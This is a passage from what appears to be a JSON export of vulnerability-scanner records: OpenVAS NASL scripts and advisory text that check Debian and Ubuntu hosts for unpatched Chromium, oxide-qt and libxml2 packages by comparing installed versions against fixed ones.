MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703637);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-1704\", \"CVE-2016-1705\", \"CVE-2016-1706\", \"CVE-2016-1707\",\n \"CVE-2016-1708\", \"CVE-2016-1709\", \"CVE-2016-1710\", \"CVE-2016-1711\",\n \"CVE-2016-5127\", \"CVE-2016-5128\", \"CVE-2016-5129\", \"CVE-2016-5130\",\n \"CVE-2016-5131\", \"CVE-2016-5132\", \"CVE-2016-5133\", \"CVE-2016-5134\",\n \"CVE-2016-5135\", \"CVE-2016-5136\", \"CVE-2016-5137\");\n script_name(\"Debian Security Advisory DSA 3637-1 (chromium-browser - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-04 16:27:39 +0530 (Thu, 04 Aug 2016)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3637.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"chromium-browser on Debian Linux\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\nthese problems have been fixed in version 52.0.2743.82-1~deb8u1.\n\nFor the testing (stretch) and unstable (sid) distributions, these problems\nhave been fixed in version 52.0.2743.82-1.\n\nWe recommend that you upgrade your chromium-browser packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities have been\ndiscovered in the chromium web browser.\n\nCVE-2016-1704 \nThe chrome development team found and fixed various issues during\ninternal auditing.\n\nCVE-2016-1705 \nThe chrome development team found and fixed various issues during\ninternal auditing.\n\nCVE-2016-1706 \nPinkie Pie discovered a way to escape the Pepper Plugin API sandbox.\n\nCVE-2016-1707 \nxisigr discovered a URL spoofing issue.\n\nCVE-2016-1708 \nAdam Varsan discovered a use-after-free issue.\n\nCVE-2016-1709 \nChenQin discovered a buffer overflow issue in the sfntly library.\n\nCVE-2016-1710 \nMariusz Mlynski discovered a same-origin bypass.\n\nCVE-2016-1711 \nMariusz Mlynski discovered another same-origin bypass.\n\nCVE-2016-5127 \ncloudfuzzer discovered a use-after-free issue.\n\nCVE-2016-5128 \nA same-origin bypass issue was discovered in the v8 javascript library.\n\nCVE-2016-5129 \nJeonghoon Shin discovered a memory corruption issue in the v8 javascript\nlibrary.\n\nCVE-2016-5130 \nWidih Matar discovered a URL spoofing issue.\n\nCVE-2016-5131 \nNick Wellnhofer discovered a use-after-free issue in the libxml2 library.\n\nCVE-2016-5132 \nBen Kelly discovered a same-origin bypass.\n\nCVE-2016-5133 \nPatch Eudor discovered an issue in proxy authentication.\n\nCVE-2016-5134 \nPaul Stone discovered an information leak in the Proxy Auto-Config\nfeature.\n\nCVE-2016-5135 \nShenYeYinJiu discovered a way to bypass the Content Security Policy.\n\nCVE-2016-5136 \nRob Wu discovered a use-after-free issue.\n\nCVE-2016-5137 \nXiaoyin Liu discovered a way to discover whether an HSTS web side had been\nvisited.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"chromedriver\", ver:\"52.0.2743.82-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium\", ver:\"52.0.2743.82-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-dbg\", ver:\"52.0.2743.82-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-inspector\", ver:\"52.0.2743.82-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"52.0.2743.82-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromedriver\", ver:\"52.0.2743.82-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium\", ver:\"52.0.2743.82-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"52.0.2743.82-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:35:19", "description": "Several vulnerabilities have been\ndiscovered in the chromium web browser.\n\nCVE-2016-1704\nThe chrome development team found and fixed various issues during\ninternal auditing.\n\nCVE-2016-1705\nThe chrome development team found and fixed various issues during\ninternal auditing.\n\nCVE-2016-1706\nPinkie Pie discovered a way to escape the Pepper Plugin API sandbox.\n\nCVE-2016-1707\nxisigr discovered a URL spoofing issue.\n\nCVE-2016-1708\nAdam Varsan discovered a use-after-free issue.\n\nCVE-2016-1709\nChenQin discovered a buffer overflow issue in the sfntly library.\n\nCVE-2016-1710\nMariusz Mlynski discovered a same-origin bypass.\n\nCVE-2016-1711\nMariusz Mlynski discovered another same-origin bypass.\n\nCVE-2016-5127\ncloudfuzzer discovered a use-after-free issue.\n\nCVE-2016-5128\nA same-origin bypass issue was discovered in the v8 javascript library.\n\nCVE-2016-5129\nJeonghoon Shin discovered a memory corruption issue in the v8 javascript\nlibrary.\n\nCVE-2016-5130\nWidih Matar discovered a URL spoofing issue.\n\nCVE-2016-5131\nNick Wellnhofer discovered a use-after-free issue in the libxml2 library.\n\nCVE-2016-5132\nBen Kelly discovered a same-origin bypass.\n\nCVE-2016-5133\nPatch Eudor discovered an issue in proxy authentication.\n\nCVE-2016-5134\nPaul Stone discovered an information leak in the Proxy Auto-Config\nfeature.\n\nCVE-2016-5135\nShenYeYinJiu discovered a way to bypass the Content Security Policy.\n\nCVE-2016-5136\nRob Wu discovered a use-after-free issue.\n\nCVE-2016-5137\nXiaoyin Liu discovered a way to discover whether an HSTS web side had been\nvisited.", "cvss3": {}, "published": "2016-08-04T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3637-1 (chromium-browser - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5129", "CVE-2016-1709", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-5134", "CVE-2016-5130", "CVE-2016-1710", "CVE-2016-1704", "CVE-2016-1711", "CVE-2016-5133", "CVE-2016-5131", "CVE-2016-1705", "CVE-2016-5135", "CVE-2016-1707", "CVE-2016-5136", "CVE-2016-5128", "CVE-2016-5132", "CVE-2016-5137", "CVE-2016-5127"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703637", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703637", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3637.nasl 3798 2016-08-04 11:01:10Z antu123 $\n# Auto-generated from advisory DSA 3637-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703637\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2016-1704\", \"CVE-2016-1705\", \"CVE-2016-1706\", \"CVE-2016-1707\",\n \"CVE-2016-1708\", \"CVE-2016-1709\", \"CVE-2016-1710\", \"CVE-2016-1711\",\n \"CVE-2016-5127\", \"CVE-2016-5128\", \"CVE-2016-5129\", \"CVE-2016-5130\",\n \"CVE-2016-5131\", \"CVE-2016-5132\", \"CVE-2016-5133\", \"CVE-2016-5134\",\n \"CVE-2016-5135\", \"CVE-2016-5136\", \"CVE-2016-5137\");\n script_name(\"Debian Security Advisory DSA 3637-1 (chromium-browser - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-04 16:27:39 +0530 (Thu, 04 Aug 2016)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3637.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(8|9)\");\n script_tag(name:\"affected\", value:\"chromium-browser on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\nthese problems have been fixed in version 52.0.2743.82-1~deb8u1.\n\nFor the testing (stretch) and unstable (sid) distributions, these problems\nhave been fixed in version 52.0.2743.82-1.\n\nWe recommend that you upgrade your chromium-browser packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been\ndiscovered in the chromium web browser.\n\nCVE-2016-1704\nThe chrome development team found and fixed various issues during\ninternal auditing.\n\nCVE-2016-1705\nThe chrome development team found and fixed various issues during\ninternal auditing.\n\nCVE-2016-1706\nPinkie Pie discovered a way to escape the Pepper Plugin API sandbox.\n\nCVE-2016-1707\nxisigr discovered a URL spoofing issue.\n\nCVE-2016-1708\nAdam Varsan discovered a use-after-free issue.\n\nCVE-2016-1709\nChenQin discovered a buffer overflow issue in the sfntly library.\n\nCVE-2016-1710\nMariusz Mlynski discovered a same-origin bypass.\n\nCVE-2016-1711\nMariusz Mlynski discovered another same-origin bypass.\n\nCVE-2016-5127\ncloudfuzzer discovered a use-after-free issue.\n\nCVE-2016-5128\nA same-origin bypass issue was discovered in the v8 javascript library.\n\nCVE-2016-5129\nJeonghoon Shin discovered a memory corruption issue in the v8 javascript\nlibrary.\n\nCVE-2016-5130\nWidih Matar discovered a URL spoofing issue.\n\nCVE-2016-5131\nNick Wellnhofer discovered a use-after-free issue in the libxml2 library.\n\nCVE-2016-5132\nBen Kelly discovered a same-origin bypass.\n\nCVE-2016-5133\nPatch Eudor discovered an issue in proxy authentication.\n\nCVE-2016-5134\nPaul Stone discovered an information leak in the Proxy Auto-Config\nfeature.\n\nCVE-2016-5135\nShenYeYinJiu discovered a way to bypass the Content Security Policy.\n\nCVE-2016-5136\nRob Wu discovered a use-after-free issue.\n\nCVE-2016-5137\nXiaoyin Liu discovered a way to discover whether an HSTS web side had been\nvisited.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"chromedriver\", ver:\"52.0.2743.82-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium\", ver:\"52.0.2743.82-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-dbg\", ver:\"52.0.2743.82-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-inspector\", ver:\"52.0.2743.82-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"52.0.2743.82-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromedriver\", ver:\"52.0.2743.82-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium\", ver:\"52.0.2743.82-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"52.0.2743.82-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:40", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-08-06T00:00:00", "type": "openvas", "title": "Ubuntu Update for oxide-qt USN-3041-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5129", "CVE-2016-1706", "CVE-2016-5134", "CVE-2016-5130", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5133", "CVE-2016-5131", "CVE-2016-1705", "CVE-2016-5135", "CVE-2016-5128", "CVE-2016-5132", "CVE-2016-5137", "CVE-2016-5127"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842848", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842848", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for oxide-qt USN-3041-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842848\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-06 05:37:10 +0200 (Sat, 06 Aug 2016)\");\n script_cve_id(\"CVE-2016-1705\", \"CVE-2016-1706\", \"CVE-2016-1710\", \"CVE-2016-1711\",\n\t\t\"CVE-2016-5127\", \"CVE-2016-5128\", \"CVE-2016-5129\", \"CVE-2016-5130\",\n \t\t\"CVE-2016-5131\", \"CVE-2016-5132\", \"CVE-2016-5133\", \"CVE-2016-5134\",\n \t\t\"CVE-2016-5135\", \"CVE-2016-5137\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for oxide-qt USN-3041-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'oxide-qt'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Multiple security issues were discovered\n in Chromium. If a user were tricked in to opening a specially crafted website,\n an attacker could potentially exploit these to read uninitialized memory,\n cause a denial of service (application crash) or execute arbitrary code.\n (CVE-2016-1705)\n\nIt was discovered that the PPAPI implementation does not validate the\norigin of IPC messages to the plugin broker process. A remote attacker\ncould potentially exploit this to bypass sandbox protection mechanisms.\n(CVE-2016-1706)\n\nIt was discovered that Blink does not prevent window creation by a\ndeferred frame. A remote attacker could potentially exploit this to bypass\nsame origin restrictions. (CVE-2016-1710)\n\nIt was discovered that Blink does not disable frame navigation during a\ndetach operation on a DocumentLoader object. A remote attacker could\npotentially exploit this to bypass same origin restrictions.\n(CVE-2016-1711)\n\nA use-after-free was discovered in Blink. If a user were tricked in to\nopening a specially crafted website, an attacker could potentially exploit\nthis to cause a denial of service via renderer process crash, or execute\narbitrary code. (CVE-2016-5127)\n\nIt was discovered that objects.cc in V8 does not prevent API interceptors\nfrom modifying a store target without setting a property. A remote\nattacker could potentially exploit this to bypass same origin\nrestrictions. (CVE-2016-5128)\n\nA memory corruption was discovered in V8. If a user were tricked in to\nopening a specially crafted website, an attacker could potentially exploit\nthis to cause a denial of service via renderer process crash, or execute\narbitrary code. (CVE-2016-5129)\n\nA security issue was discovered in Chromium. A remote attacker could\npotentially exploit this to spoof the currently displayed URL.\n(CVE-2016-5130)\n\nA use-after-free was discovered in libxml. If a user were tricked in to\nopening a specially crafted website, an attacker could potentially exploit\nthis to cause a denial of service via renderer process crash, or execute\narbitrary code. (CVE-2016-5131)\n\nThe Service Workers implementation in Chromium does not properly implement\nthe Secure Contexts specification during decisions about whether to\ncontrol a subframe. A remote attacker could potentially exploit this to\nbypass same origin restrictions. (CVE-2016-5132)\n\nIt was discovered that Chromium mishandles origin information during proxy\nauthentication. A man-in-the-middle attacker could potentially exploit this\nto spoof a proxy authentication login prompt. (CVE-2016-5133)\n\nIt was discovered that the Proxy Auto-Config (PAC) feature in Chromium\ndoes ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"oxide-qt on Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3041-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3041-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:i386\", ver:\"1.16.5-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:amd64\", ver:\"1.16.5-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:i386\", ver:\"1.16.5-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:amd64\", ver:\"1.16.5-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:54:49", "description": "Several vulnerabilities were discovered\nin libxml2, a library providing support to read, modify and write XML and HTML\nfiles. A remote attacker could provide a specially crafted XML or HTML file that,\nwhen processed by an application using libxml2, would cause a denial-of-service\nagainst the application, or potentially, the execution of arbitrary code with\nthe privileges of the user running the application.", "cvss3": {}, "published": "2016-12-23T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3744-1 (libxml2 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5131", "CVE-2016-4658"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703744", "href": "http://plugins.openvas.org/nasl.php?oid=703744", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3744.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3744-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703744);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-4658\", \"CVE-2016-5131\");\n script_name(\"Debian Security Advisory DSA 3744-1 (libxml2 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-12-23 00:00:00 +0100 (Fri, 23 Dec 2016)\");\n script_tag(name: \"cvss_base\", value: \"10.0\");\n script_tag(name: \"cvss_base_vector\", value: \"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3744.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"libxml2 on Debian Linux\");\n script_tag(name: \"insight\", value: \"XML is a metalanguage to let you\ndesign your own markup language. A regular markup language defines a way to\ndescribe information in a certain class of documents (eg HTML). XML lets you\ndefine your own customized markup languages for many classes of document. It\ncan do this because it's written in SGML, the international standard\nmetalanguage for markup languages.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\nthese problems have been fixed in version 2.9.1+dfsg1-5+deb8u4.\n\nFor the testing distribution (stretch), these problems have been fixed\nin version 2.9.4+dfsg1-2.1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.9.4+dfsg1-2.1.\n\nWe recommend that you upgrade your libxml2 packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities were discovered\nin libxml2, a library providing support to read, modify and write XML and HTML\nfiles. A remote attacker could provide a specially crafted XML or HTML file that,\nwhen processed by an application using libxml2, would cause a denial-of-service\nagainst the application, or potentially, the execution of arbitrary code with\nthe privileges of the user running the application.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libxml2:amd64\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2:i386\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libxml2-dbg:amd64\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-dbg:i386\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libxml2-dev:amd64\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-dev:i386\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libxml2-doc\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-utils\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-utils-dbg\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-libxml2\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-libxml2-dbg\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2:amd64\", ver:\"2.9.4+dfsg1-2.1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2:i386\", ver:\"2.9.4+dfsg1-2.1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libxml2-dbg:amd64\", ver:\"2.9.4+dfsg1-2.1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-dbg:i386\", ver:\"2.9.4+dfsg1-2.1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libxml2-dev:amd64\", ver:\"2.9.4+dfsg1-2.1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-dev:i386\", ver:\"2.9.4+dfsg1-2.1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libxml2-doc\", ver:\"2.9.4+dfsg1-2.1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-utils\", ver:\"2.9.4+dfsg1-2.1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-utils-dbg\", ver:\"2.9.4+dfsg1-2.1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-libxml2\", ver:\"2.9.4+dfsg1-2.1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-libxml2-dbg\", ver:\"2.9.4+dfsg1-2.1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python3-libxml2\", ver:\"2.9.4+dfsg1-2.1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python3-libxml2-dbg\", ver:\"2.9.4+dfsg1-2.1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:35:25", "description": "Several vulnerabilities were discovered\nin libxml2, a library providing support to read, modify and write XML and HTML\nfiles. A remote attacker could provide a specially crafted XML or HTML file 